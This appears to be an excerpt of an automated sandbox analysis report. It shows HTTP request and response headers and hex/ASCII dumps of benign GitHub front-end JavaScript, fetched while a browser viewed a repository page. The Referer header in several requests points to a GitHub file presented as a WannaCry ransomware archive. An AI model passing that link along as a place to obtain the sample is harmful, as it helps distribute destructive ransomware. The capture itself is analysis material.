                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 17237
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 20 Mar 2024 23:33:55 GMT
                                                                                      ETag: 0x8DC493635B95375
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 159478
                                                                                      X-Served-By: cache-iad-kjyo7100099-IAD, cache-lga21937-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 35, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: e0295fe4395e636ff2cf12e48b543ccba5e2aad8
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 70 61 74 68 73 5f 69 6e 64 65 78 5f 74 73 22 5d 2c 7b 32 32 33 32 36 3a 28 65 2c 6e 2c 74 29 3d 3e 7b 74 2e 64 28 6e 2c 7b 24 5f 3a 28 29 3d 3e 69 2e 24 5f 2c 24 67 3a 28 29 3d 3e 69 2e 24 67 2c 24 74 3a 28 29 3d 3e 69 2e 24 74 2c 41 34 3a 28 29 3d 3e 69 2e 41 34 2c 41 54 3a 28 29 3d 3e 69 2e 41 54 2c 41 71 3a 28 29 3d 3e 69 2e 41 71 2c 42 37 3a 28 29 3d 3e 69 2e 42 37 2c 42 4b 3a 28 29 3d 3e 69 2e 42 4b 2c 42 79 3a 28 29 3d 3e 69 2e 42 79 2c 43 32 3a 28 29 3d 3e 69 2e 43 32 2c 43 39 3a 28 29 3d 3e
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_paths_index_ts"],{22326:(e,n,t)=>{t.d(n,{$_:()=>i.$_,$g:()=>i.$g,$t:()=>i.$t,A4:()=>i.A4,AT:()=>i.AT,Aq:()=>i.Aq,B7:()=>i.B7,BK:()=>i.BK,By:()=>i.By,C2:()=>i.C2,C9:()=>
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 29 3d 3e 69 2e 6d 59 2c 6d 70 3a 28 29 3d 3e 69 2e 6d 70 2c 6e 4d 3a 28 29 3d 3e 69 2e 6e 4d 2c 6f 41 3a 28 29 3d 3e 69 2e 6f 41 2c 70 31 3a 28 29 3d 3e 69 2e 70 31 2c 70 4d 3a 28 29 3d 3e 69 2e 70 4d 2c 70 74 3a 28 29 3d 3e 69 2e 70 74 2c 71 30 3a 28 29 3d 3e 69 2e 71 30 2c 73 30 3a 28 29 3d 3e 69 2e 73 30 2c 73 41 3a 28 29 3d 3e 69 2e 73 41 2c 74 34 3a 28 29 3d 3e 69 2e 74 34 2c 74 69 3a 28 29 3d 3e 69 2e 74 69 2c 74 78 3a 28 29 3d 3e 69 2e 74 78 2c 75 50 3a 28 29 3d 3e 69 2e 75 50 2c 75 5f 3a 28 29 3d 3e 69 2e 75 5f 2c 76 32 3a 28 29 3d 3e 69 2e 76 32 2c 76 35 3a 28 29 3d 3e 69 2e 76 35 2c 77 32 3a 28 29 3d 3e 69 2e 77 32 2c 77 45 3a 28 29 3d 3e 69 2e 77 45 2c 77 75 3a 28 29 3d 3e 69 2e 77 75 2c 77 79 3a 28 29 3d 3e 69 2e 77 79 2c 78 41 3a 28 29 3d 3e
                                                                                      Data Ascii: )=>i.mY,mp:()=>i.mp,nM:()=>i.nM,oA:()=>i.oA,p1:()=>i.p1,pM:()=>i.pM,pt:()=>i.pt,q0:()=>i.q0,s0:()=>i.s0,sA:()=>i.sA,t4:()=>i.t4,ti:()=>i.ti,tx:()=>i.tx,uP:()=>i.uP,u_:()=>i.u_,v2:()=>i.v2,v5:()=>i.v5,w2:()=>i.w2,wE:()=>i.wE,wu:()=>i.wu,wy:()=>i.wy,xA:()=>
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 29 3d 3e 6f 2c 6d 54 3a 28 29 3d 3e 65 65 2c 6d 59 3a 28 29 3d 3e 61 2c 6d 70 3a 28 29 3d 3e 65 34 2c 6e 4d 3a 28 29 3d 3e 6e 64 2c 6f 41 3a 28 29 3d 3e 65 71 2c 70 31 3a 28 29 3d 3e 65 43 2c 70 4d 3a 28 29 3d 3e 6e 68 2c 70 74 3a 28 29 3d 3e 65 30 2c 71 30 3a 28 29 3d 3e 65 64 2c 73 30 3a 28 29 3d 3e 6e 69 2c 73 41 3a 28 29 3d 3e 71 2c 74 34 3a 28 29 3d 3e 52 2c 74 69 3a 28 29 3d 3e 78 2c 74 78 3a 28 29 3d 3e 6e 6a 2c 75 50 3a 28 29 3d 3e 50 2c 75 5f 3a 28 29 3d 3e 65 44 2c 76 32 3a 28 29 3d 3e 65 37 2c 76 35 3a 28 29 3d 3e 79 2c 77 32 3a 28 29 3d 3e 54 2c 77 45 3a 28 29 3d 3e 6e 6e 2c 77 75 3a 28 29 3d 3e 65 70 2c 77 79 3a 28 29 3d 3e 7a 2c 78 41 3a 28 29 3d 3e 6e 6d 2c 78 52 3a 28 29 3d 3e 65 67 2c 78 70 3a 28 29 3d 3e 6e 67 2c 78 72 3a 28 29 3d 3e
                                                                                      Data Ascii: ()=>o,mT:()=>ee,mY:()=>a,mp:()=>e4,nM:()=>nd,oA:()=>eq,p1:()=>eC,pM:()=>nh,pt:()=>e0,q0:()=>ed,s0:()=>ni,sA:()=>q,t4:()=>R,ti:()=>x,tx:()=>nj,uP:()=>P,u_:()=>eD,v2:()=>e7,v5:()=>y,w2:()=>T,wE:()=>nn,wu:()=>ep,wy:()=>z,xA:()=>nm,xR:()=>eg,xp:()=>ng,xr:()=>
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 62 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 72 65 66 4e 61 6d 65 3a 74 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 62 72 61 6e 63 68 65 73 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 74 29 7d 60 2c 76 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 62 72 61 6e 63 68 65 73 2f 63 68 65 63 6b 5f 74 61 67 5f 6e 61 6d 65 5f 65 78 69 73 74 73 60 2c 79 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 62 72 61 6e 63 68 3a 74 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 74 72 65 65 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 74
                                                                                      Data Ascii: b=({owner:e,repo:n,refName:t})=>`/${(0,i.j9)(e)}/${(0,i.j9)(n)}/branches/${(0,i.j9)(t)}`,v=({owner:e,repo:n})=>`/${(0,i.j9)(e)}/${(0,i.j9)(n)}/branches/check_tag_name_exists`,y=({owner:e,repo:n,branch:t})=>`/${(0,i.j9)(e)}/${(0,i.j9)(n)}/tree/${(0,i.j9)(t
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 69 2e 6a 39 29 2e 6a 6f 69 6e 28 22 2f 22 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 28 65 29 7b 72 65 74 75 72 6e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6f 77 6e 65 72 4c 6f 67 69 6e 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6e 61 6d 65 29 7d 60 7d 66 75 6e 63 74 69 6f 6e 20 71 28 65 29 7b 72 65 74 75 72 6e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6f 77 6e 65 72 4c 6f 67 69 6e 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6e 61 6d 65 29 7d 3f 66 69 6c 65 73 3d 31 60 7d 66 75 6e 63 74 69 6f 6e 20 44 28 7b 72 65 70 6f 3a 65 2c 63 6f 6d 6d 69 74 69 73 68 3a 6e 2c 61 63 74 69 6f 6e 3a 74 2c 70 61 74 68 3a 72 7d 29 7b 6c 65 74 20 6f 3d 5b 22 22 2c 65 2e 6f 77 6e 65 72 4c 6f 67 69 6e 2c 65 2e 6e 61 6d 65 2c 74 2c 6e 5d 3b 72 65 74 75 72 6e 20 72
                                                                                      Data Ascii: (i.j9).join("/")}function Z(e){return`/${(0,i.j9)(e.ownerLogin)}/${(0,i.j9)(e.name)}`}function q(e){return`/${(0,i.j9)(e.ownerLogin)}/${(0,i.j9)(e.name)}?files=1`}function D({repo:e,commitish:n,action:t,path:r}){let o=["",e.ownerLogin,e.name,t,n];return r
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 29 7d 60 7d 6c 65 74 20 47 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 63 6f 6d 6d 69 74 69 73 68 3a 74 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 60 24 7b 65 7d 2f 24 7b 6e 7d 2f 63 6f 6d 6d 69 74 2f 24 7b 74 7d 2f 68 6f 76 65 72 63 61 72 64 60 29 7d 60 2c 48 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 63 6f 6d 6d 69 74 69 73 68 3a 74 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 60 24 7b 65 7d 2f 24 7b 6e 7d 2f 62 72 61 6e 63 68 5f 63 6f 6d 6d 69 74 73 2f 24 7b 74 7d 60 29 7d 60 2c 56 3d 28 7b 74 6f 70 69 63 4e 61 6d 65 3a 65 7d 29 3d 3e 60 2f 74 6f 70 69 63 73 2f 24 7b 65 7d 60 2c 57 3d 28 7b 63 61 74 65 67 6f 72 79 4e 61 6d 65 3a 65 7d 29 3d 3e 60 2f 6d 61 72 6b 65 74 70 6c 61 63 65 2f 63 61 74 65 67 6f 72 79 2f 24 7b
                                                                                      Data Ascii: )}`}let G=({owner:e,repo:n,commitish:t})=>`/${(0,i.j9)(`${e}/${n}/commit/${t}/hovercard`)}`,H=({owner:e,repo:n,commitish:t})=>`/${(0,i.j9)(`${e}/${n}/branch_commits/${t}`)}`,V=({topicName:e})=>`/topics/${e}`,W=({categoryName:e})=>`/marketplace/category/${
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 26 26 33 30 21 3d 3d 73 26 26 24 2e 70 75 73 68 28 60 70 65 72 5f 70 61 67 65 3d 24 7b 73 7d 60 29 2c 60 24 7b 6e 7d 2f 24 7b 61 2e 6d 61 70 28 69 2e 6a 39 29 2e 6a 6f 69 6e 28 22 2f 22 29 7d 24 7b 24 2e 6c 65 6e 67 74 68 3e 30 3f 60 3f 24 7b 24 2e 6a 6f 69 6e 28 22 26 22 29 7d 60 3a 22 22 7d 60 7d 66 75 6e 63 74 69 6f 6e 20 65 69 28 7b 72 65 70 6f 3a 65 2c 62 61 73 65 55 72 6c 3a 6e 3d 22 22 2c 62 72 61 6e 63 68 3a 74 2c 74 69 6d 65 50 65 72 69 6f 64 3a 72 7d 29 7b 6c 65 74 20 6f 3d 5b 65 2e 6f 77 6e 65 72 4c 6f 67 69 6e 2c 65 2e 6e 61 6d 65 2c 22 61 63 74 69 76 69 74 79 22 2c 22 61 63 74 6f 72 73 22 5d 2c 73 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 26 26 73 2e 70 75 73 68 28 60 72 65 66 3d 24 7b 28 30 2c 69 2e 6a 39 29 28 74 29 7d 60 29 2c 72 26 26 73 2e
                                                                                      Data Ascii: s&&30!==s&&$.push(`per_page=${s}`),`${n}/${a.map(i.j9).join("/")}${$.length>0?`?${$.join("&")}`:""}`}function ei({repo:e,baseUrl:n="",branch:t,timePeriod:r}){let o=[e.ownerLogin,e.name,"activity","actors"],s=[];return t&&s.push(`ref=${(0,i.j9)(t)}`),r&&s.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 70 75 6c 6c 2f 24 7b 74 7d 23 69 73 73 75 65 63 6f 6d 6d 65 6e 74 2d 24 7b 72 7d 60 2c 65 64 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 6e 75 6d 62 65 72 3a 74 2c 63 6f 6e 74 65 6e 74 49 64 3a 72 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 70 75 6c 6c 2f 24 7b 74 7d 23 70 75 6c 6c 72 65 71 75 65 73 74 72 65 76 69 65 77 2d 24 7b 72 7d 60 2c 65 5f 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 6e 75 6d 62 65 72 3a 74 2c 63 6f 6e 74 65 6e 74 49 64 3a 72 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 70 75 6c 6c 2f 24 7b 74 7d 23
                                                                                      Data Ascii: ${(0,i.j9)(e)}/${(0,i.j9)(n)}/pull/${t}#issuecomment-${r}`,ed=({owner:e,repo:n,number:t,contentId:r})=>`/${(0,i.j9)(e)}/${(0,i.j9)(n)}/pull/${t}#pullrequestreview-${r}`,e_=({owner:e,repo:n,number:t,contentId:r})=>`/${(0,i.j9)(e)}/${(0,i.j9)(n)}/pull/${t}#
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 63 75 73 73 69 6f 6e 73 2f 24 7b 74 7d 23 64 69 73 63 75 73 73 69 6f 6e 63 6f 6d 6d 65 6e 74 2d 24 7b 72 7d 60 2c 65 7a 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 64 69 73 63 75 73 73 69 6f 6e 4e 75 6d 62 65 72 3a 74 2c 63 6f 6e 74 65 6e 74 49 64 3a 72 7d 29 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 24 7b 74 7d 23 64 69 73 63 75 73 73 69 6f 6e 2d 24 7b 72 7d 60 3b 66 75 6e 63 74 69 6f 6e 20 65 50 28 65 2c 6e 29 7b 72 65 74 75 72 6e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 6e 29 7d 2f 69 73 73 75 65 73 60 7d 6c 65 74 20 65 6b 3d 28 7b 6f 77 6e 65 72 3a 65 2c 72 65 70 6f 3a 6e 2c 69 73 73 75 65 4e 75 6d 62 65
                                                                                      Data Ascii: cussions/${t}#discussioncomment-${r}`,ez=({owner:e,repo:n,discussionNumber:t,contentId:r})=>`/${(0,i.j9)(e)}/${(0,i.j9)(n)}/discussions/${t}#discussion-${r}`;function eP(e,n){return`/${(0,i.j9)(e)}/${(0,i.j9)(n)}/issues`}let ek=({owner:e,repo:n,issueNumbe
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 72 65 70 6f 5f 69 64 22 2c 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 29 2c 60 2f 72 65 70 6f 73 69 74 6f 72 69 65 73 2f 66 6f 72 6d 73 2f 6f 77 6e 65 72 5f 64 65 74 61 69 6c 3f 24 7b 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 60 7d 6c 65 74 20 65 54 3d 65 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6f 77 6e 65 72 4c 6f 67 69 6e 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6e 61 6d 65 29 7d 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 60 2c 65 42 3d 65 3d 3e 60 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6f 77 6e 65 72 4c 6f 67 69 6e 29 7d 2f 24 7b 28 30 2c 69 2e 6a 39 29 28 65 2e 6e 61 6d 65 29 7d 2f 73 65 74 74 69 6e 67 73 2f 61 63 63 65 73 73 60 3b 66 75 6e 63 74 69 6f 6e 20 65 45 28 7b 6f 72 67 3a 65 2c 70 72 6f 70 65 72 74 79 4e 61 6d
                                                                                      Data Ascii: repo_id",t.toString())),`/repositories/forms/owner_detail?${r.toString()}`}let eT=e=>`/${(0,i.j9)(e.ownerLogin)}/${(0,i.j9)(e.name)}/graphs/contributors`,eB=e=>`/${(0,i.j9)(e.ownerLogin)}/${(0,i.j9)(e.name)}/settings/access`;function eE({org:e,propertyNam


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      64192.168.2.1649769185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC676OUTGET /assets/ui_packages_ref-selector_RefSelector_tsx-dbbdef4348e2.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 18129
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 23 Feb 2024 16:22:16 GMT
                                                                                      ETag: 0x8DC348B9980FBA0
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 864433
                                                                                      X-Served-By: cache-iad-kiad7000175-IAD, cache-lga21972-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1184, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 597a5265f3e30cf6b77015da1754ffedd81bc7f1
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 72 65 66 2d 73 65 6c 65 63 74 6f 72 5f 52 65 66 53 65 6c 65 63 74 6f 72 5f 74 73 78 22 5d 2c 7b 34 36 30 33 37 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 57 3a 28 29 3d 3e 53 65 61 72 63 68 49 6e 64 65 78 2c 72 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 61 2c 6e 3d 72 28 35 36 33 36 33 29 2c 69 3d 72 28 34 33 37 38 36 29 3b 6c 65 74 7b 67 65 74 49 74 65 6d 3a 73 2c 73 65 74 49 74 65 6d 3a 63 2c 72 65 6d 6f 76 65 49 74 65 6d 3a 6c 7d 3d 28 30 2c 6e 2e 5a 29 28 22 6c 6f 63 61 6c 53 74 6f 72 61
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_ref-selector_RefSelector_tsx"],{46037:(e,t,r)=>{r.d(t,{W:()=>SearchIndex,r:()=>a});var a,n=r(56363),i=r(43786);let{getItem:s,setItem:c,removeItem:l}=(0,n.Z)("localStora
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 63 75 72 72 65 6e 74 53 65 61 72 63 68 52 65 73 75 6c 74 3d 74 68 69 73 2e 6b 6e 6f 77 6e 49 74 65 6d 73 3b 72 65 74 75 72 6e 7d 6c 65 74 20 72 3d 5b 5d 2c 61 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 28 74 68 69 73 2e 65 78 61 63 74 4d 61 74 63 68 46 6f 75 6e 64 3d 21 31 2c 74 68 69 73 2e 6b 6e 6f 77 6e 49 74 65 6d 73 29 29 69 66 28 21 28 28 74 3d 6e 2e 69 6e 64 65 78 4f 66 28 65 29 29 3c 30 29 29 7b 69 66 28 30 3d 3d 3d 74 29 7b 65 3d 3d 3d 6e 3f 28 61 2e 75 6e 73 68 69 66 74 28 6e 29 2c 74 68 69 73 2e 65 78 61 63 74 4d 61 74 63 68 46 6f 75 6e 64 3d 21 30 29 3a 61 2e 70 75 73 68 28 6e 29 3b 63 6f 6e 74 69 6e 75 65 7d 72 2e 70 75 73 68 28 6e 29 7d 74 68 69 73 2e 63 75 72 72 65 6e 74 53 65 61 72 63 68 52 65 73 75 6c 74 3d 5b 2e 2e 2e 61 2c 2e 2e 2e
                                                                                      Data Ascii: currentSearchResult=this.knownItems;return}let r=[],a=[];for(let n of(this.exactMatchFound=!1,this.knownItems))if(!((t=n.indexOf(e))<0)){if(0===t){e===n?(a.unshift(n),this.exactMatchFound=!0):a.push(n);continue}r.push(n)}this.currentSearchResult=[...a,...
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 66 45 6e 64 70 6f 69 6e 74 3d 72 2c 74 68 69 73 2e 63 61 63 68 65 4b 65 79 3d 61 2c 74 68 69 73 2e 6e 61 6d 65 57 69 74 68 4f 77 6e 65 72 3d 6e 7d 7d 3b 53 65 61 72 63 68 49 6e 64 65 78 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 50 72 65 66 69 78 3d 22 72 65 66 2d 73 65 6c 65 63 74 6f 72 22 7d 2c 31 35 36 33 31 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 44 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 61 3d 72 28 36 37 32 39 34 29 2c 6e 3d 72 28 32 32 38 37 37 29 2c 69 3d 72 28 31 38 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 72 3d 5b 5d 29 7b 6c 65 74 20 73 3d 28 30 2c 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 2c 72 29 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 28 30 2c 61 2e 75 73 65 43 6f 6e 74 65 78 74 29 28 69 2e 6b 62
                                                                                      Data Ascii: fEndpoint=r,this.cacheKey=a,this.nameWithOwner=n}};SearchIndex.LocalStoragePrefix="ref-selector"},15631:(e,t,r)=>{r.d(t,{D:()=>s});var a=r(67294),n=r(22877),i=r(18);function s(e,t,r=[]){let s=(0,a.useCallback)(e,r),c=function(){let e=(0,a.useContext)(i.kb
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6e 74 61 69 6e 65 72 49 6e 6e 65 72 22 29 7d 63 61 74 63 68 7b 7d 74 72 79 7b 68 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 68 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 49 74 65 6d 43 6f 6e 74 61 69 6e 65 72 22 29 7d 63 61 74 63 68 7b 7d 7d 2c 38 33 38 32 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 68 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 61 3d 72 28 38 35 38 39 33 29 2c 6e 3d 72 28 34 32 34 38 33 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 7b 74 65 78 74 3a 65 2c 73 65 61 72 63 68 3a 74 2c 68 69 64 65 4f 76 65 72 66 6c 6f 77 3a 72 3d 21 31 2c 6f 76 65 72 66 6c 6f 77 57 69 64 74 68 3a 69 3d 30 7d 29 7b 6c 65 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 5b 65 5d 3b 6c 65 74 20 72 3d 65 2e 74 6f 4c 6f
                                                                                      Data Ascii: ntainerInner")}catch{}try{h.displayName||(h.displayName="ItemContainer")}catch{}},83822:(e,t,r)=>{r.d(t,{h:()=>i});var a=r(85893),n=r(42483);function i({text:e,search:t,hideOverflow:r=!1,overflowWidth:i=0}){let s=function(e,t){if(!t)return[e];let r=e.toLo
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 72 61 6e 63 68 20 6e 61 6d 65 2e 20 4d 61 6e 79 20 47 69 74 20 63 6f 6d 6d 61 6e 64 73 20 61 63 63 65 70 74 20 62 6f 74 68 20 74 61 67 20 61 6e 64 20 62 72 61 6e 63 68 20 6e 61 6d 65 73 2c 20 73 6f 20 63 72 65 61 74 69 6e 67 20 74 68 69 73 20 62 72 61 6e 63 68 20 6d 61 79 20 63 61 75 73 65 20 75 6e 65 78 70 65 63 74 65 64 20 62 65 68 61 76 69 6f 72 2e 20 41 72 65 20 79 6f 75 20 73 75 72 65 20 79 6f 75 20 77 61 6e 74 20 74 6f 20 63 72 65 61 74 65 20 74 68 69 73 20 62 72 61 6e 63 68 3f 22 7d 29 2c 28 30 2c 61 2e 6a 73 78 73 29 28 68 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 66 6c 65 78 2d 65 6e 64 22 2c 6d 74 3a 33 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 61 2e 6a 73 78 29 28 69
                                                                                      Data Ascii: ranch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?"}),(0,a.jsxs)(h.Z,{sx:{display:"flex",justifyContent:"flex-end",mt:3},children:[(0,a.jsx)(i
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 65 3d 3e 7b 78 28 65 29 2c 72 3f 2e 28 65 29 7d 2c 5b 72 2c 78 5d 29 2c 52 3d 28 30 2c 79 2e 75 73 65 4d 65 6d 6f 29 28 28 29 3d 3e 6d 3f 7b 69 6e 69 74 69 61 6c 46 6f 63 75 73 52 65 66 3a 75 7d 3a 7b 69 6e 69 74 69 61 6c 46 6f 63 75 73 52 65 66 3a 75 2c 64 69 73 61 62 6c 65 64 3a 21 30 7d 2c 5b 6d 2c 75 5d 29 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 6b 2e 77 2c 7b 6f 70 65 6e 3a 66 2c 6f 76 65 72 6c 61 79 50 72 6f 70 73 3a 7b 72 6f 6c 65 3a 22 64 69 61 6c 6f 67 22 2c 77 69 64 74 68 3a 22 6d 65 64 69 75 6d 22 7d 2c 6f 6e 4f 70 65 6e 3a 28 29 3d 3e 77 28 21 30 29 2c 6f 6e 43 6c 6f 73 65 3a 28 29 3d 3e 21 64 26 26 77 28 21 31 29 2c 72 65 6e 64 65 72 41 6e 63 68 6f 72 3a 65 3d 3e 28 30 2c 61 2e 6a 73 78 73 29 28 61 2e 46 72 61 67 6d 65 6e 74 2c 7b
